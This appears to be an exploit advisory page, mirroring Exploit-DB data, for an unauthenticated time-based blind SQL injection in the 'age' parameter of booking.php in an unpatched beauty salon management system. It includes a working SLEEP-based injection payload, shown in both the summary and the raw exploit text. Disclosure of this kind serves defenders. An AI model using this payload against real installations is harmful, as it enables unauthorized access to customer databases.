Beauty Parlour & SPA Saloon Management System Unauthenticated Blind SQL Injection (booking.php age) Vulnerability

vendor:

Beauty Parlour & SPA Saloon Management System

by:

Yakir Wizman

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: Beauty Parlour & SPA Saloon Management System

Affected Version From: All Versions

Affected Version To: All Versions

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Apache | PHP 5.5.36 | MySQL 5.6.30

2016

Beauty Parlour & SPA Saloon Management System Unauthenticated Blind SQL Injection (booking.php age) Vulnerability

No authentication (login) is required to exploit this vulnerability. Blind SQL Injection Proof-Of-Concept (Using SQLMap) URL example: http://server/booking.php Page: booking.php Parameter: age (POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: name=Test&age=2016' AND SLEEP(5) AND 'hhFr'='hhFr&sex=on&mobile=+972-50-7655443&email=test@gmail.com&date=07/12/2016&btext=Test

Mitigation:

Input validation and sanitization should be done to prevent SQL injection attacks.

Source

Exploit-DB raw data:

####
# Vulnerability Title 	: Beauty Parlour & SPA Saloon Management System Unauthenticated Blind SQL Injection (booking.php age) Vulnerability 
# Date 			: 11/07/2016
# Exploit Author 	: Yakir Wizman
# Vendor Homepage 	: http://rexbd.net/software/beauty-parlour-and-spa-saloon-management-system
# Version		: All Versions
# Tested on		: Apache | PHP 5.5.36 | MySQL 5.6.30
####
# Software Link	 	: N/A
# Google Dork 		: N/A
# CVE 			: N/A
####

# Vendor Software Description:
# Managing a health and beauty business is a unique endeavor that is unlike any other. You want an operating software that will enhance the atmosphere you’ve worked hard to instill in your salon.
# Our salon management system was created to effectively match the needs of health and beauty business owners nationwide.
# When you purchase this beauty Parlour / salon software, you will find that every aspect of managing your company is covered in this extensive system.
####

# No authentication (login) is required to exploit this vulnerability.
# Blind SQL Injection Proof-Of-Concept (Using SQLMap)
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# URL example	: http://server/booking.php
#
# Page		: booking.php
# Parameter	: age (POST)
#    Type	: AND/OR time-based blind
#    Title	: MySQL >= 5.0.12 AND time-based blind
#    Payload	: name=Test&age=2016' AND SLEEP(5) AND 'hhFr'='hhFr&sex=on&mobile=+972-50-7655443&email=test@gmail.com&date=07/12/2016&btext=Test
# 
####